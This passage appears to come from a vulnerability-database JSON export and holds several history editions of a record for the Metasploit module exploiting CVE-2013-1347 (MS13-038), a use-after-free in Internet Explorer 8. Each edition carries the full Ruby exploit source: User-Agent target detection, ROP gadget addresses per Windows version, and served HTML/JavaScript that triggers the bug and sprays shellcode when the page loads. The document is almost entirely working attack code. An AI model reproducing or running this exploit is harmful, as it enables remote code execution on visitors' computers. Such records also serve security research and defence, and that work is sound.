:msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-16T01:52:58", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-16T03:46:15", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-16T03:46:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-16T03:46:15", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-20T16:10:24", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-20T16:10:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-20T16:10:24", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-20T17:53:54", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-20T17:53:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-20T17:53:54", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-23T11:50:32", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-23T11:50:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object 